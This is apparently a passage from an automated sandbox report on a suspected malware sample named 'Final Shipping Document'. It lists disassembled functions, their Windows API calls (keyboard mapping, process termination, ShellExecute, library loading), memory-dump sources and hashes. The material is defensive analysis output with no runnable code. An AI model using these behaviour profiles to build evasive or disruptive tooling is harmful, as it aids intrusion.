                                                            • GetDC.USER32(00000000), ref: 00C05218
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C05229
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C05230
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C05238
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C0524F
                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C05261
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 7af4ca61c170ed5fb4d15625cf49087e31ac4284f4e17aef6bf05d9925b1b267
                                                            • Instruction ID: a14a596e33b08468d26639d701c90f97fcc69b057d10d8d9e2e15b45a9482105
                                                            • Opcode Fuzzy Hash: 7af4ca61c170ed5fb4d15625cf49087e31ac4284f4e17aef6bf05d9925b1b267
                                                            • Instruction Fuzzy Hash: CF014F75A01719BBEB109BA59C89B5EBFB8EF48751F044065FA04E7291D6709900CFA0
                                                            Function 00BA1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                            • Instruction ID: 37a869a46f8b19288a6e39e61a6df53e70984358f0d6e0a265d208b73761cc0f
                                                            • Opcode Fuzzy Hash: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                            • Instruction Fuzzy Hash: 190144B0902B5ABDE3008F6A8C85B56FEA8FF19354F00411BA15C4BA42C7B5A864CBE5
                                                            Function 00C0EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C0EB30
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C0EB46
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C0EB55
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB64
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB6E
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                            • Instruction ID: 6b629becbc261f123aa8f9cefd4dcd18feeb5ea25f3134323eecd1bff76f88c2
                                                            • Opcode Fuzzy Hash: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                            • Instruction Fuzzy Hash: 69F03A72250158BBE7215B629C8EFEF3A7CEFCAB11F004158F611E1091D7A05A01DBB5
                                                            Function 00BF7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?), ref: 00BF7452
                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BF7469
                                                            • GetWindowDC.USER32(?), ref: 00BF7475
                                                            • GetPixel.GDI32(00000000,?,?), ref: 00BF7484
                                                            • ReleaseDC.USER32(?,00000000), ref: 00BF7496
                                                            • GetSysColor.USER32(00000005), ref: 00BF74B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                            • String ID:
                                                            • API String ID: 272304278-0
                                                            • Opcode ID: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                            • Instruction ID: 4f6c9aa1bdf2eaab19c99ba33b6420cb25febf3572f637629be4b14b1d3c7ca0
                                                            • Opcode Fuzzy Hash: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                            • Instruction Fuzzy Hash: FA014B31410619EFEB515F64DC49BBE7BB5FB04311F5501A4FA16A31A1CF311E51AB50
                                                            Function 00C01874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C0187F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C0188B
                                                            • CloseHandle.KERNEL32(?), ref: 00C01894
                                                            • CloseHandle.KERNEL32(?), ref: 00C0189C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C018A5
                                                            • HeapFree.KERNEL32(00000000), ref: 00C018AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                            • Instruction ID: 7c59a94b981d715b6b436e904d3bb4aba61807102083d38a0b2149049fad765a
                                                            • Opcode Fuzzy Hash: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                            • Instruction Fuzzy Hash: 01E0E536014101BBDB015FA1ED8CB4EBF39FF4AB22B108220F225A1070CB329430EF50
                                                            Function 00C0C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C0C6EE
                                                            • _wcslen.LIBCMT ref: 00C0C735
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C0C79C
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C0C7CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                            • String ID: 0
                                                            • API String ID: 1227352736-4108050209
                                                            • Opcode ID: b9f50c3c101f0251b3b708dcf8e41a9858ad0b9378e5d6622a662f1d5eee04fd
                                                            • Instruction ID: f097164b10e2465d60b7b031202dab1e7e5aacf1d0baaa44f830d6ddfe227ee4
                                                            • Opcode Fuzzy Hash: b9f50c3c101f0251b3b708dcf8e41a9858ad0b9378e5d6622a662f1d5eee04fd
                                                            • Instruction Fuzzy Hash: 46519D716183019BD7259F2CC8C5B6E77E8AB89310F040B29F9A5E21E0DBB4DA44DB52
                                                            Function 00C2AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00C2AEA3
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                            • GetProcessId.KERNEL32(00000000), ref: 00C2AF38
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2AF67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                            • String ID: <$@
                                                            • API String ID: 146682121-1426351568
                                                            • Opcode ID: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                            • Instruction ID: 4086162e5bf82a8461742fb08f8f28c3fbe2088d1d29fd31bd7d58eddcfcf7e5
                                                            • Opcode Fuzzy Hash: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                            • Instruction Fuzzy Hash: 2C71AE71A04625DFCB14EF94D494A9EBBF0FF09310F048499E826AB762CB74EE45CB91
                                                            Function 00C0719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C07206
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C0723C
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C0724D
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C072CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 753597075-1075368562
                                                            • Opcode ID: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                            • Instruction ID: f0c755907e4e39e46cde0a21008a9c601967225d72c2a026262a477fcfb4607b
                                                            • Opcode Fuzzy Hash: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                            • Instruction Fuzzy Hash: 32418EB1A04204EFDF19CF54C984B9A7BA9EF44310F1581A9BD059F28AD7B0EE40DBA0
                                                            Function 00C01DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C01E66
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C01E79
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C01EA9
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2081771294-1403004172
                                                            • Opcode ID: 330fc16bf07774650b766596895c6d91a423d634d8c38ccb425e2a0b796259ee
                                                            • Instruction ID: 7f9a267ddbbe023626cd65b20ce9213b00b4ced8c261485724506219b63f3020
                                                            • Opcode Fuzzy Hash: 330fc16bf07774650b766596895c6d91a423d634d8c38ccb425e2a0b796259ee
                                                            • Instruction Fuzzy Hash: A021D671A00104ABDB149B64DC8ADFFB7B9DF46390B184169FC35A71E1DB744A05D620
                                                            Function 00C32F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C32F8D
                                                            • LoadLibraryW.KERNEL32(?), ref: 00C32F94
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C32FA9
                                                            • DestroyWindow.USER32(?), ref: 00C32FB1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                            • String ID: SysAnimate32
                                                            • API String ID: 3529120543-1011021900
                                                            • Opcode ID: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                            • Instruction ID: 5582d86e00d19c700a595a23e761959cf1f5dbccf4dc4e314e90c0ffe2e9f19a
                                                            • Opcode Fuzzy Hash: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                            • Instruction Fuzzy Hash: A321AC72224225ABEF205FA4DC81FBB77B9EB5D364F100628FA60E2190D771DC919760
                                                            Function 00BC4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002), ref: 00BC4D8D
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC4DA0
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000), ref: 00BC4DC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                            • Instruction ID: b423a1b96d8f2b2ce2444d8c4d0b6a3e84d4c3ce742370259c408c06eb50dad5
                                                            • Opcode Fuzzy Hash: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                            • Instruction Fuzzy Hash: 69F04F35A50208BBDB11AF90DC89FAEBBF5EF44751F0001A8F906A2260CB705E40DF91
                                                            Function 00BA4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E9C
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA4EAE
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 145871493-3689287502
                                                            • Opcode ID: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                            • Instruction ID: df97ec569fb9e49a3ffe69c765931d9b82328b6738db0bfd3f14d4879247aea4
                                                            • Opcode Fuzzy Hash: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                            • Instruction Fuzzy Hash: 6AE0C236A166225BD2321B25BC58B6FB698EFC3F63B050165FC01F3200DBE0CD0296E0
                                                            Function 00BA4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E62
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA4E74
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 145871493-1355242751
                                                            • Opcode ID: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                            • Instruction ID: f2a1e799a9c1f0c618d615254cec66e12739eeef8beb83322db0e0582b45dcd2
                                                            • Opcode Fuzzy Hash: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                            • Instruction Fuzzy Hash: 4CD0C2365166215746321B247C48F8F7A98EFC2B113050161B801F2110CFA0CD0296D0
                                                            Function 00C2A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 00C2A427
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C2A435
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C2A468
                                                            • CloseHandle.KERNEL32(?), ref: 00C2A63D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
                                                            • Instruction ID: 65c3ef6b10499b54b3c50abc484ca55d19446cfbec2e76529a1b7d4e84aa5f07
                                                            • Opcode Fuzzy Hash: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
                                                            • Instruction Fuzzy Hash: 42A1C071604300AFD720EF24D882F2AB7E1AF84714F14885DF56A9B792DBB1ED41CB82
                                                            Function 00BDBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                            • _free.LIBCMT ref: 00BDBB7F
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
